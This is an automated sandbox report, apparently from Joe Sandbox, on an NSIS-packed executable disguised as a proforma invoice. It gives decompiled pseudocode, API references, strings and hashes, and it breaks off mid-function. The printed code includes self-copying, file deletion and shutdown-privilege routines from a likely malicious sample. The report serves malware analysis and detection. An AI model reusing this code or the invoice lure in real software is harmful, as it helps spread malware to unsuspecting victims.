								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								__eflags = _t44 + 2;
								E00405B66("C:\\Users\\jones\\AppData\\Local\\Temp", _t44 + 2);
								L20:
								_t105 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E00403208(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C72(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035BD();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34;
											if( *0x423f34 != 0) {
												_t106 = E00405E88(3);
												_t100 = E00405E88(4);
												_t55 = E00405E88(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c;
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405427(_v408, 0x200010);
										ExitProcess(2);
									}
									if( *0x423ebc == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004036AF();
										goto L32;
									}
									_t103 = E00405684(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										if(lstrcmpiA(_t105, "C:\\Users\\jones\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405B66("C:\\Users\\jones\\AppData\\Local\\Temp", "C:\\Users\\jones\\Desktop");
										}
										E00405B66(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x120)));
											DeleteFileA(0x41f058);
											if(_v416 != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\Proforma Invoice and Bank swift-REG.PI-0086547654.exe", 0x41f058, 1) != 0) {
												_push(0);
												_push(0x41f058);
												E004058B4();
												E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x124)));
												_t79 = E004053C6(0x41f058);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004058B4();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E0040573A(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405B66("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									E00405B66("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E00403208(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}

0x00403248
0x0040324c
0x00403254
0x00403256
0x0040325b
0x00403266
0x0040326d
0x00403275
0x0040327f
0x00403295
0x004032a5
0x004032aa
0x004032b0
0x004032b7
0x004032ca
0x004032cf
0x004032d1
0x004032d3
0x004032d8
0x004032d8
0x004032e8
0x004032ee
0x00403357
0x00403357
0x00403359
0x0040335b
0x00000000
0x00000000
0x004032f4
0x004032f7
0x004032ff
0x004032ff
0x00403302
0x00403307
0x00403309
0x00403309
0x0040330a
0x0040330a
0x0040330f
0x00403312
0x00403347
0x0040334c
0x00403351
0x00403354
0x00403356
0x00403356
0x00403356
0x00000000
0x00403314
0x00403314
0x00403315
0x00403318
0x00403320
0x00403323
0x00403325
0x00403325
0x00403325
0x00403323
0x00403328
0x0040332e
0x00403336
0x00403339
0x0040333b
0x0040333b
0x0040333b
0x00403339
0x0040333e
0x00403345
0x0040335f
0x00403362
0x0040336b
0x00403370
0x00403370
0x0040337b
0x00403381
0x00403386
0x00403388
0x004033aa
0x004033af
0x004033b6
0x004033bd
0x004033c1
0x00403428
0x00403428
0x0040342d
0x00403437
0x00403522
0x00403528
0x00403533
0x0040353c
0x0040353e
0x00403543
0x00403545
0x00403547
0x00403549
0x0040354b
0x0040354d
0x0040354f
0x0040355f
0x00403561
0x00403563
0x00403570
0x0040357f
0x00403587
0x0040358f
0x0040358f
0x00403563
0x0040354f
0x0040354b
0x00403594
0x0040359a
0x0040359c
0x004035a0
0x004035a0
0x0040359c
0x004035a5
0x004035aa
0x004035ad
0x004035af
0x004035af
0x004035b7
0x004035b7
0x00403446
0x0040344d
0x0040344d
0x004033c9
0x00403418
0x00403418
0x00403424
0x00000000
0x00403424
0x004033d2
0x004033df
0x004033d6
0x004033dc
0x00000000
0x00000000
0x004033de
0x004033de
0x004033de
0x004033e3
0x004033e5
0x004033ed
0x00403459
0x0040346d
0x00000000
0x00000000
0x00403471
0x00403478
0x0040347e
0x00403484
0x0040348c
0x0040348c
0x0040349a
0x004034a1
0x004034aa
0x004034b0
0x004034bc
0x004034c2
0x004034cc
0x004034e0
0x004034e1
0x004034e2
0x004034f3
0x004034f9
0x00403500
0x00403503
0x00403509
0x00403509
0x00403500
0x0040350d
0x00403513
0x00403513
0x00403516
0x00403517
0x00403518
0x00000000
0x00403518
0x004033ef
0x004033f1
0x004033fc
0x00000000
0x00000000
0x00403404
0x0040340f
0x00403414
0x00000000
0x00403414
0x00403390
0x0040339c
0x004033a1
0x004033a6
0x004033a8
0x00000000
0x00000000
0x00000000
0x004033a8
0x00000000
0x00403345
0x00000000
0x00000000
0x00000000
0x004032f9
0x004032f9
0x004032f9
0x004032fa
0x004032fa
0x00000000
0x004032f9
0x00000000

APIs

#17.COMCTL32 ref: 0040325B
SetErrorMode.KERNELBASE(00008001), ref: 00403266
OleInitialize.OLE32(00000000), ref: 0040326D

Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6

SHGetFileInfoA.SHELL32(0041F458,00000000,?,00000160,00000000,00000008), ref: 00403295

Part of subcall function 00405B66: lstrcpynA.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73

GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 004032AA
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,00000000), ref: 004032BD
CharNextA.USER32(00000000,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,00000020), ref: 004032E8
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040337B
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403390
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040339C
DeleteFileA.KERNELBASE(1033), ref: 004033AF
OleUninitialize.OLE32(00000000), ref: 0040342D
ExitProcess.KERNEL32 ref: 0040344D
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,00000000,00000000), ref: 00403459
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,00000000,00000000), ref: 00403465
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403471
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403478
DeleteFileA.KERNEL32(0041F058,0041F058,?,00424000,?), ref: 004034C2
CopyFileA.KERNEL32 ref: 004034D6
CloseHandle.KERNEL32(00000000,0041F058,0041F058,?,0041F058,00000000), ref: 00403503
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403558
ExitWindowsEx.USER32(00000002,00000000), ref: 00403594
ExitProcess.KERNEL32 ref: 004035B7

Strings

SeShutdownPrivilege, xrefs: 0040356A
NSIS Error, xrefs: 0040329B
C:\Users\user\AppData\Local\Temp, xrefs: 00403366, 004033FF, 0040347E, 00403487
C:\Users\user\Desktop, xrefs: 0040345E, 00403463, 00403486
", xrefs: 0040330A
_?=, xrefs: 004033D6
C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, xrefs: 004034D1
~nsu.tmp, xrefs: 00403453
1033, xrefs: 004033AA
C:\Users\user\AppData\Local\Temp\, xrefs: 00403370, 00403375, 0040338F, 0040339B, 00403458, 00403464, 00403470, 00403477, 00403517
NCRC, xrefs: 00403328
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040324C
"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" , xrefs: 004032B0, 004032B6, 004033CC
Error launching installer, xrefs: 004033E5
\Temp, xrefs: 00403396
C:\Users\user\AppData\Local\Temp, xrefs: 0040340A
/D=, xrefs: 0040333E

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$"$"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2278157092-2454231774
Opcode ID: b237e16242222b526cfbc7eec5e85b12329012a3d6ce1955aa8a6be5a5dec380
Instruction ID: d9df3101e86bd055252ea398e1a167ecdf9755d8b7b18b8fa076e16bcd865dbe
Opcode Fuzzy Hash: b237e16242222b526cfbc7eec5e85b12329012a3d6ce1955aa8a6be5a5dec380
Instruction Fuzzy Hash: E191D231A087417EE7216F609D49B2B7EACEB01306F44457BF941B61E2C77CAE058B6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040548B, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0040548B(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040573A(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405B66(0x4214a8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004056A0(_t72);
					} else {
						lstrcatA(0x4214a8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E00405684( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B66(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040581E(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404F04(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404F04(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004058B4();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040548B(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a8 - 0x5c;
					if( *0x4214a8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405E61(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405659(_t72);
							E0040581E(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404F04(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404F04(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004058B4();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x00405496
0x0040549a
0x004054a3
0x004054a6
0x004054a9
0x004054b1
0x004054b3
0x004054b4
0x00000000
0x004054b4
0x004054c3
0x004054c3
0x004054c6
0x004054c9
0x004054dd
0x004054e4
0x004054e9
0x004054eb
0x004054fb
0x004054ed
0x004054f3
0x004054f3
0x00405500
0x00405503
0x0040550e
0x00405514
0x00405519
0x00405529
0x0040552b
0x00405531
0x00405534
0x00405537
0x004055f4
0x004055f4
0x004055f8
0x004055fa
0x004055fa
0x004055fa
0x004055fa
0x00000000
0x00000000
0x00000000
0x00000000
0x0040553d
0x0040553d
0x00405546
0x0040554c
0x00405551
0x00405554
0x00405556
0x0040555a
0x0040555c
0x0040555c
0x0040555a
0x0040555f
0x00405562
0x00405575
0x00405577
0x0040557c
0x00405583
0x0040559b
0x004055a1
0x004055a7
0x004055a9
0x004055ce
0x004055ab
0x004055ab
0x004055af
0x004055c3
0x004055b1
0x004055b4
0x004055b9
0x004055bb
0x004055bc
0x004055bc
0x004055af
0x00405585
0x0040558b
0x0040558d
0x00405593
0x00405593
0x0040558d
0x00000000
0x00405583
0x00405564
0x00405567
0x00405569
0x00000000
0x00000000
0x0040556b
0x0040556d
0x00000000
0x00000000
0x0040556f
0x00405573
0x00000000
0x00000000
0x00000000
0x004055d3
0x004055dd
0x004055e3
0x004055e3
0x004055ee
0x00000000
0x004055ee
0x00405505
0x0040550c
0x00000000
0x00000000
0x00000000
0x004054cb
0x004054cb
0x004054cd
0x004055fe
0x00405601
0x00405604
0x00405656
0x00405656
0x00405656
0x00405606
0x00405609
0x00405614
0x00405619
0x0040561b
0x00000000
0x00000000
0x0040561e
0x00405624
0x0040562a
0x00405630
0x00405632
0x00000000
0x0040564e
0x00405634
0x00405638
0x00000000
0x00000000
0x0040563d
0x00405642
0x00405643
0x00000000
0x00405644
0x0040560b
0x0040560b
0x00000000
0x0040560b
0x004054d3
0x004054d7
0x00000000
0x00000000
0x00000000
0x004054d7

APIs

DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,73BCF560), ref: 004054A9
lstrcatA.KERNEL32(004214A8,\*.*,004214A8,?,00000000,?,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,73BCF560), ref: 004054F3
lstrcatA.KERNEL32(?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,73BCF560), ref: 00405514
lstrlenA.KERNEL32(?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,73BCF560), ref: 0040551A
FindFirstFileA.KERNEL32(004214A8,?,?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,73BCF560), ref: 0040552B
FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004055DD
FindClose.KERNEL32(?), ref: 004055EE

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040548B
"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" , xrefs: 00405495
\*.*, xrefs: 004054ED

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1951495138
Opcode ID: 6c8ee5a3fe02bedcc3e1648cc4c34db6c3543f7bd00f265664a9289eb0c65dd6
Instruction ID: bc429f5d1e1b14784ce7e3564347ec6ed469848bfd5577fff983359c073685a4
Opcode Fuzzy Hash: 6c8ee5a3fe02bedcc3e1648cc4c34db6c3543f7bd00f265664a9289eb0c65dd6
Instruction Fuzzy Hash: 0351F331904A447ADB216B218C45BBF3B79CF42728F54847BF905711E2CB3C5A82DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 6F731A98, Relevance: 20.1, APIs: 13, Instructions: 591
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E6F731A98() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				CHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				CHAR* _t207;
				signed int _t210;
				void* _t212;
				void* _t214;
				CHAR* _t216;
				void* _t224;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t228;
				signed short _t230;
				struct HINSTANCE__* _t233;
				struct HINSTANCE__* _t235;
				void* _t236;
				char* _t237;
				void* _t248;
				signed char _t249;
				signed int _t250;
				void* _t254;
				struct HINSTANCE__* _t256;
				void* _t257;
				signed int _t259;
				intOrPtr _t260;
				char* _t263;
				signed int _t268;
				signed int _t271;
				signed int _t273;
				void* _t276;
				void* _t280;
				struct HINSTANCE__* _t282;
				intOrPtr _t285;
				void _t286;
				signed int _t287;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				void* _t304;
				signed int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				intOrPtr _t319;
				intOrPtr* _t320;
				CHAR* _t321;
				CHAR* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				void* _t327;
				signed int _t328;
				void* _t329;

				_t282 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t329 = 0;
				_v52 = 0;
				_v44 = 0;
				_t207 = E6F731215();
				_v24 = _t207;
				_v28 = _t207;
				_v48 = E6F731215();
				_t320 = E6F73123B();
				_v56 = _t320;
				_v12 = _t320;
				while(1) {
					_t210 = _v32;
					_v60 = _t210;
					if(_t210 != _t282 && _t329 == _t282) {
						break;
					}
					_t319 =  *_t320;
					_t285 = _t319;
					_t212 = _t285 - _t282;
					if(_t212 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t214 = _v60 - _t282;
						if(_t214 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t329 - _t282;
							if(_t329 == _t282) {
								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
								_t329 = _t254;
								 *(_t329 + 0x810) = _t282;
								 *(_t329 + 0x814) = _t282;
							}
							_t286 = _v36;
							_t47 = _t329 + 8; // 0x8
							_t216 = _t47;
							_t48 = _t329 + 0x408; // 0x408
							_t321 = _t48;
							 *_t329 = _t286;
							 *_t216 =  *_t216 & 0x00000000;
							 *(_t329 + 0x808) = _t282;
							 *_t321 =  *_t321 & 0x00000000;
							_t287 = _t286 - _t282;
							__eflags = _t287;
							 *(_t329 + 0x80c) = _t282;
							 *(_t329 + 4) = _t282;
							if(_t287 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t327 = 0;
								GlobalFree(_t329);
								_t329 = E6F7312FE(_v24);
								__eflags = _t329 - _t282;
								if(_t329 == _t282) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t248 =  *(_t329 + 0x14a0);
									__eflags = _t248 - _t282;
									if(_t248 == _t282) {
										break;
									}
									_t327 = _t329;
									_t329 = _t248;
									__eflags = _t329 - _t282;
									if(_t329 != _t282) {
										continue;
									}
									break;
								}
								__eflags = _t327 - _t282;
								if(_t327 != _t282) {
									 *(_t327 + 0x14a0) = _t282;
								}
								_t249 =  *(_t329 + 0x810);
								__eflags = _t249 & 0x00000008;
								if((_t249 & 0x00000008) == 0) {
									_t250 = _t249 | 0x00000002;
									__eflags = _t250;
									 *(_t329 + 0x810) = _t250;
								} else {
									_t329 = E6F731534(_t329);
									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t299 = _t287 - 1;
								__eflags = _t299;
								if(_t299 == 0) {
									L31:
									lstrcpyA(_t216, _v48);
									L32:
									lstrcpyA(_t321, _v24);
									goto L42;
								}
								_t300 = _t299 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									goto L32;
								}
								__eflags = _t300 != 1;
								if(_t300 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t214 == 1) {
								_t256 = _v16;
								if(_v40 == _t282) {
									_t256 = _t256 - 1;
								}
								 *(_t329 + 0x814) = _t256;
							}
							L42:
							_v12 = _v12 + 1;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t320 = _v12;
								continue;
							}
							break;
						}
					}
					_t257 = _t212 - 0x23;
					if(_t257 == 0) {
						__eflags = _t320 - _v56;
						if(_t320 <= _v56) {
							L17:
							__eflags = _v44 - _t282;
							if(_v44 != _t282) {
								L43:
								_t259 = _v32 - _t282;
								__eflags = _t259;
								if(_t259 == 0) {
									_t260 = _t319;
									while(1) {
										__eflags = _t260 - 0x22;
										if(_t260 != 0x22) {
											break;
										}
										_t320 = _t320 + 1;
										__eflags = _v44 - _t282;
										_v12 = _t320;
										if(_v44 == _t282) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[1]);
											 *_v28 =  *_t320;
											L58:
											_t328 = _t320 + 1;
											__eflags = _t328;
											_v12 = _t328;
											goto L59;
										}
										_t260 =  *_t320;
										_v44 = _t282;
									}
									__eflags = _t260 - 0x2a;
									if(_t260 == 0x2a) {
										_v36 = 2;
										L57:
										_t320 = _v12;
										_v28 = _v24;
										_t282 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t260 - 0x2d;
									if(_t260 == 0x2d) {
										L151:
										_t303 =  *_t320;
										__eflags = _t303 - 0x2d;
										if(_t303 != 0x2d) {
											L154:
											_t263 = _t320 + 1;
											__eflags =  *_t263 - 0x3a;
											if( *_t263 != 0x3a) {
												goto L162;
											}
											__eflags = _t303 - 0x2d;
											if(_t303 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t263;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 =  *_v48 & 0x00000000;
											} else {
												 *_v28 =  *_v28 & 0x00000000;
												lstrcpyA(_v48, _v24);
											}
											goto L57;
										}
										_t263 = _t320 + 1;
										__eflags =  *_t263 - 0x3e;
										if( *_t263 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t260 - 0x3a;
									if(_t260 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t268 = _t259 - 1;
								__eflags = _t268;
								if(_t268 == 0) {
									L80:
									_t304 = _t285 + 0xffffffde;
									__eflags = _t304 - 0x55;
									if(_t304 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t304 + 0x6f732259) & 0x000000ff) * 4 +  &M6F7321CD))) {
										case 0:
											__eax = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												L131:
												__eflags =  *(__edi + 1) - __dl;
												if( *(__edi + 1) != __dl) {
													L136:
													 *__eax =  *__eax & 0x00000000;
													__eax = E6F731224(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __cl;
												if(__cl == 0) {
													goto L136;
												}
												__eflags = __cl - __dl;
												if(__cl == __dl) {
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__cl =  *__edi;
												 *__eax =  *__edi;
												__eax = __eax + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
